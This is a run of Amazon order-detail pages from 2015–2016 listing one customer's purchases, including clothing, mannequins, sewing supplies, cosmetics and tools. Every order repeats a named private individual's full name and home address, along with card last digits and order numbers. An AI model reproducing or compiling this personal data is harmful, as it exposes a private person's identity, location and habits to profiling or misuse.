Order Total: $16.98 Shipped on October 2, 2015 Items Ordered Price 1 of: Club Room Men's Crew Neck Solid Merino Blend Sweater Ebony Heather XL Sold by: Flooga -FREE Shipping FREE Returns (seller profile) $16.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $16.98 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $16.98Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$16.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #105-9749388-4587448 Order Placed: October 1, 2015 Amazon.com order number: 105-9749388-4587448 Order Total: $108.79 Shipped on October 2, 2015 Items Ordered 1 of: Warrior Alpaca Socks -Men's Superfine Alpaca Ribbed Dress Socks Charcoal L Sold by: Incredible Natural Creations from Alpaca -INCA Brands (seller profile) Condition: New 2 of: ECCO Men's Merino Wool Dress Sock,Black,10 to 13 Sold by: Amazon.com Services LLC Condition: New Price $12.75 $11.00 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 3, 2015 Items Ordered 1 of: Jack Spade Men's Olson Marled Crew Neck Sweater, Black, X-Large Sold by: 6pm (seller profile) Condition: New Price $59.99 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 2, 2015 Print this page for your records. Items Ordered Price 1 of: Fan-tastik Mens Eco-friendly Jacquard Weave Flouard Solid Color Skinny Tie 2'' [ $14.05 5cm ] Royal Blue Sold by: Elviros (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $108.79 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $108.79 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$108.79 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-8083105-5061012 Order Placed: October 13, 2015 Amazon.com order number: 104-8083105-5061012 Order Total: $13.95 Shipped on October 14, 2015 Items Ordered Price 1 of: DMSO Pure 99% Liquid -16 oz Sold by: All Veterinary Supply (seller profile) $13.95 Condition: New Free Priority Shipping. Get it faster! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $13.95 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $13.95 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$13.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-0834227-8563456 Order Placed: October 14, 2015 Amazon.com order number: 104-0834227-8563456 Order Total: $104.30 Shipped on October 14, 2015 Items Ordered Price 1 of: Displays2go Hanging Male Mannequins, Black, Set of 5 $104.30 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $104.30 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $104.30 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$104.30 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-9075590-8298646 Order Placed: October 14, 2015 Amazon.com order number: 104-9075590-8298646 Order Total: $30.70 Shipped on October 15, 2015 Items Ordered Price 1 of: Inflatable Mannequin, Male Torso, Large Silver Sold by: Inflatable Mannequins (seller profile) $20.95 Condition: New New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $20.95 Debit Card | Last digits: 0079 Shipping & Handling: $9.75 Billing address Total before tax: $30.70 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$30.70 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #102-4903424-0479414 Order Placed: October 24, 2015 Amazon.com order number: 102-4903424-0479414 Order Total: $41.44 Shipped on October 26, 2015 Items Ordered Price 1 of: Dachstein Woolwear Over the Knee Austrian Wool Socks (8, Green) Sold by: Sweater Chalet (seller profile) $33.95 Condition: New DW-5114-5115-OverKnee Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Payment information Payment Method: Item(s) Subtotal: $33.95 Debit Card | Last digits: 0079 Shipping & Handling: $7.49 Billing address Total before tax: $41.44 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$41.44 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #102-5848874-7228254 Order Placed: October 24, 2015 Amazon.com order number: 102-5848874-7228254 Order Total: $34.84 Shipped on October 25, 2015 Items Ordered Price 1 of: 6 Pairs Pack Men's 71% Merino Wool Hiking Boot Socks 10-13 Sold by: Different touch (seller profile) $28.85 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $28.85 Debit Card | Last digits: 0079 Shipping & Handling: $5.99 Billing address Total before tax: $34.84 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$34.84 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0765445-1005841 Order Placed: November 7, 2015 Amazon.com order number: 108-0765445-1005841 Order Total: $159.96 Shipped on November 8, 2015 Items Ordered Price 4 of: 100% Silk Sewing Thread Cone, 5,000 Yard $39.99 Sold by: KEANMART (seller profile) Condition: New Shipped and serviced by Amazon. Return for any reason for 30 days. 100% satisfaction guaranteed. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $159.96 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $159.96 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$159.96 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-2727721-0352239 Order Placed: December 2, 2015 Amazon.com order number: 108-2727721-0352239 Order Total: $63.69 Shipped on December 3, 2015 Items Ordered Price 1 of: Scotchgard Fabric and Upholstery Protector, 10-Ounce, 2-Pack Sold by: Amazon.com Services LLC $19.99 Condition: New 1 of: Scotchgard Outdoor Water Shield, 10.5-Ounce Sold by: Amazon.com Services LLC $8.75 Condition: New 5 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $6.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $63.69 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $63.69 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$63.69 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-7183237-4613829 Order Placed: December 22, 2015 Amazon.com order number: 115-7183237-4613829 Order Total: $6.61 Shipped on December 22, 2015 Items Ordered Price 1 of: SquareTrade 2-Year Housewares Extended Protection Plan ($75-99.99) Sold by: Allstate Protection Plans (seller profile) $6.25 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.25 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $6.25 Brian Joseph Coady Estimated tax to be collected: $0.36 1454 Monroe St. NW Washington, DC 20010 Grand Total:$6.61 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-8414138-2812214 Order Placed: December 22, 2015 Amazon.com order number: 115-8414138-2812214 Order Total: $8.08 Shipped on December 23, 2015 Items Ordered Price 1 of: Stretch Machine Needles-Size 11/75 5/Pkg Sold by: Amazon.com Services LLC $8.08 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.08 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $8.08 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$8.08 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-6120493-2789067 Subscribe and Save Order Placed: December 25, 2016 Amazon.com order number: 108-6120493-2789067 Order Total: $18.08 This order contains Subscribe & Save items. Shipped on January 5, 2017 Items Ordered Price 1 of: The Laundress Ironing Water, Classic, 16 ounce Sold by: Amazon.com Services LLC $18.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $18.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.90 Billing address Total before tax: $17.10BRIAN J COADY Estimated tax to be collected: $0.981454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$18.08 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8229541-6800263 Order Placed: December 20, 2016 Amazon.com order number: 111-8229541-6800263 Order Total: $111.22 Shipped on December 20, 2016 Items Ordered Price 5 of: Swash 80240512 Pods Awaken Cups (12 Pack), Orange $8.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 21, 2016 Items Ordered Price 1 of: Propane Torch with Push Button Igniter $56.29 Sold by: Acme Platinum (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 20, 2016 Items Ordered Price Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $108.22 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $108.22BRIAN J COADY Estimated tax to be collected: $3.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$111.22 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6900704-5701852 Order Placed: December 20, 2016 Amazon.com order number: 111-6900704-5701852 Order Total: $48.40 Shipped on December 21, 2016 Items Ordered Price 1 of: Propane Tank Carrier Cylinder Dolly Easy Cart for Tanks, Heaters, Torches and BBQ Grills (Tank Not Included) Sold by: nextpower (seller profile) $39.45 Condition: New Contiguous US only -sorry no APO/FPO. New in mfg packaging. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $39.45 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $8.95 Billing address Total before tax: $48.40BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$48.40 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5066540-9867408 Order Placed: December 20, 2016 Amazon.com order number: 111-5066540-9867408 Order Total: $19.99 Shipped on December 21, 2016 Items Ordered Price 1 of: Peeps Eyeglass Cleaner (Green) Sold by: Bold Home Products (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0000169-0313846 Order Placed: December 6, 2016 Amazon.com order number: 108-0000169-0313846 Order Total: $26.99 Shipped on December 7, 2016 Items Ordered Price 1 of: Utopia Bedding Micro Plush Ultra Soft and Overfilled Fleece Queen Mattress Pad Sold by: Utopia Deals (seller profile) | Product question? Ask Seller $26.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $26.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $26.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$26.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-6617919-5095432 Order Placed: December 6, 2016 Amazon.com order number: 108-6617919-5095432 Order Total: $108.35 Shipped on December 9, 2016 Items Ordered Price 1 of: Outdoor Research Men's Helium II Jacket, Large, Pewter $108.35 Sold by: OutdoorEquipped (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Grand Total:$108.35 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $108.35 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $108.35 Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-4541255-9893806 Order Placed: December 6, 2016 Amazon.com order number: 108-4541255-9893806 Order Total: $57.48 Shipped on December 7, 2016 Items Ordered 2 of: ALASKA BEAR -Natural Silk Gloves Thermal Liner Unisex Sold by: Alaska Bear (seller profile) | Product question? Ask Seller Condition: New Price $12.99 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 7, 2016 Items Ordered 1 of: Terramar Men's Thermasilk Filament Pant (Black, Small) Sold by: Amazon.com Services LLC Condition: New Price $29.79 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Item(s) Subtotal: $55.77 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $55.77 BRIAN J COADY Estimated tax to be collected: $1.71 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$57.48 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-2932561-2153843 Order Placed: December 6, 2016 Amazon.com order number: 108-2932561-2153843 Order Total: $7.95 Shipped on December 7, 2016 Items Ordered Price 1 of: DMSO Pure 99% Liquid -16 oz Sold by: Muddy and Inca (seller profile) $7.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $7.95 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #106-4944724-5490602 Order Placed: November 21, 2016 Amazon.com order number: 106-4944724-5490602 Order Total: $221.30 Shipped on November 21, 2016 Items Ordered Price 1 of: Woolly Clothing Co. Men's Merino Wool Long Sleeve Henley (190 GSM) Small $49.99 Linen Sold by: Woolly Clothing Co (seller profile) Condition: New 1 of: Woolly Clothing Co. Men's Merino Wool Boxer Brief Medium Glacier Blue $29.99 Sold by: Woolly Clothing Co (seller profile) Condition: New 1 of: Woolly Clothing Co. Men's Merino Wool Boxer Brief Medium Green $29.99 Sold by: Woolly Clothing Co (seller profile) Condition: New 1 of: Woolly Clothing Co. Men's Merino Wool Long Sleeve Henley (190 GSM) X-Large $49.99 Grey Sold by: Woolly Clothing Co (seller profile) Condition: New 1 of: SPANX Targeted Core T-Shirt, M, White $58.00 Sold by: Zappos (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $217.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $217.96 BRIAN J COADY Estimated tax to be collected: $3.34 1454 MONROE ST NW WASHINGTON, DC 20010 United States Grand Total:$221.30 To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-2462979-5593058 Order Placed: October 22, 2016 Amazon.com order number: 108-2462979-5593058 Order Total: $15.83 Shipped on October 23, 2016 Items Ordered Price 1 of: VTech CS6114 DECT 6.0 Cordless Phone with Caller ID/Call Waiting, White/Grey $14.97 with 1 Handset Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.97BRIAN J COADY Estimated tax to be collected: $0.861454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$15.83 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-5253176-5241822 Order Placed: October 18, 2016 Amazon.com order number: 108-5253176-5241822 Order Total: $257.43 Shipped on October 19, 2016 Items Ordered 1 of: One Fast Cat Exercise Wheel -Black Sold by: One Fast Cat (seller profile) Condition: New Price $199.00 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 19, 2016 Items Ordered 1 of: AMERIMAX HOME PRODUCTS 850678 8-Inch x 20-Feet Copper Flashing Sold by: Life and Home (seller profile) Condition: New 1 of: Hillman Fastener Corp 42081 Copper Nail Sold by: Amazon.com Services LLC Condition: New Price $44.99 $12.71 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $256.70 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $256.70 Estimated tax to be collected: $0.73 ---- WASHINGTON, DC 20010 Grand Total:$257.43 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #116-5812974-2914669 Order Placed: October 10, 2016 Amazon.com order number: 116-5812974-2914669 Order Total: $94.45 Shipped on October 11, 2016 Items Ordered Price 1 of: PLEMO Sleep Mask, Gel Pack Eye Shade Set, Hot & Cold Therapy for Insomnia, $10.00 Puffy Eyes & Dark Circles Sold by: Claybox Limited US (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 11, 2016 Items Ordered Price 1 of: Squatty Potty The Original Adjustable Height Bathroom Toilet Stool-Tao Bamboo $79.86 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $89.86 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $89.86 BRIAN J COADY Estimated tax to be collected: $4.59 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$94.45 United States To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-9435599-3458640 Order Placed: October 6, 2016 Amazon.com order number: 108-9435599-3458640 Order Total: $19.19 Shipped on October 7, 2016 Items Ordered Price 1 of: Bluecell Repair Replacement Screws for Unibody Apple Macbook Air 13-Inch A1369, MC503, MC504, Pack of 10 Sold by: Kingboo (seller profile) $5.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 6, 2016 Items Ordered Price 1 of: TEKTON 2830 Everybit (TM) Precision Bit and Driver Kit for Electronic and $12.48 Precision Devices, 27-Piece Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $18.47 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $18.47 BRIAN J COADY Estimated tax to be collected: $0.72 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$19.19 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-8159635-6101820 Order Placed: October 6, 2016 Amazon.com order number: 108-8159635-6101820 Order Total: $85.35 Shipped on October 6, 2016 Items Ordered Price 1 of: Salmon darkcircle concealer cream #1 (0.35oz/10g) Sold by: Amazon.com Services LLC $8.25 Condition: New 1 of: Clinique Redness Solutions Soothing Cleanser 150ml/5oz -All Skin Types Sold by: Haute Health & Beauty (seller profile) $36.36 Condition: New 2 of: Pre De Provence Maison French Lavender Blossom Linen Water (1000ml) Sold by: Amazon.com Services LLC $15.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on October 6, 2016 Items Ordered Price 1 of: L'Oreal Paris True Match Naturale Gentle Mineral Blush, Sugar Plum, 0.15 Ounces $7.49 Sold by: Open Range Wholesale (seller profile) | Product question? Ask Seller Condition: New #490 Sugar Plum. Single bottle. Brand new ready for you to wear on your face. 91510 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Payment information Payment Method: Item(s) Subtotal: $83.10 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $83.10 BRIAN J COADY Estimated tax to be collected: $2.251454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$85.35 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-7392560-8211439 Order Placed: October 6, 2016 Amazon.com order number: 108-7392560-8211439 Order Total: $8.37 Shipped on October 7, 2016 Items Ordered Price 1 of: Maybelline New York Dream Bouncy Blush, Candy Coral, 0.19 Oz Sold by: (seller profile) $8.37 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $8.37 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.37 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$8.37 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-1397840-1357058 Order Placed: October 6, 2016 Amazon.com order number: 108-1397840-1357058 Order Total: $6.49 Shipped on October 6, 2016 Items Ordered Price 1 of: Almay Wake Up Undereye Concealer, Light, 0.22 Fluid Ounce Sold by: Beauty Savings (seller profile) $6.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.49 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.49 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0686131-6632219 Order Placed: October 6, 2016 Amazon.com order number: 108-0686131-6632219 Order Total: $7.25 Shipped on October 6, 2016 Items Ordered Price 1 of: CoverGirl TRUblend Mineral Blush -Shimmering Sands (430) Sold by: Alexa's store (seller profile) $7.25 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $7.25 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $7.25 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.25 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #109-3075762-2208223 Subscribe and Save Order Placed: September 29, 2016 Amazon.com order number: 109-3075762-2208223 Order Total: $16.15 This order contains Subscribe & Save items. Shipped on October 3, 2016 Items Ordered Price 1 of: The Laundress Ironing Water, Classic, 16 ounce Sold by: Amazon.com Services LLC $17.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.85 Billing address Total before tax: $16.15BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$16.15 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-5309708-0581831 Order Placed: September 26, 2016 Amazon.com order number: 108-5309708-0581831 Order Total: $15.98 Shipped on September 27, 2016 Items Ordered Price 1 of: Bluecell Repair Replacement Screws for Unibody Apple Macbook Air 13-Inch A1369, MC503, MC504, Pack of 10 Sold by: Kingboo (seller profile) $5.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on September 26, 2016 Items Ordered Price 1 of: Slice 10514 Mini Cutter, Ceramic Safety Blade, Pocket Sized, Auto-Retractable, $9.99 Stays Sharp Up to 10X Longer Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $15.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $15.98 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$15.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-2663431-9974655 Order Placed: September 26, 2016 Amazon.com order number: 108-2663431-9974655 Order Total: $8.34 Shipped on September 26, 2016 Items Ordered Price 1 of: PH000 Phillips Keyboard Screws (100pcs) -Apple MacBook Air (2010-2015) & MacBook Pro Retina (2012-2015) Sold by: beetstech (seller profile) $5.29 Condition: New Brand new condition. 60 day WARRANTY! Orders made by 4:00PM Pacific time ship SAME DAY! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $5.29 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $3.05 Billing address Total before tax: $8.34BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$8.34 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-7861760-2004218 Order Placed: September 14, 2016 Amazon.com order number: 108-7861760-2004218 Order Total: $11.99 Shipped on September 15, 2016 Items Ordered Price 1 of: Wholey 10 Pack side brushes 3 armed For irobot Roomba 800 900 series 870 880 980 Robotic Vacuum Parts (10pcs 3 armed side Brushs) Sold by: wholeyhome (seller profile) $11.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day 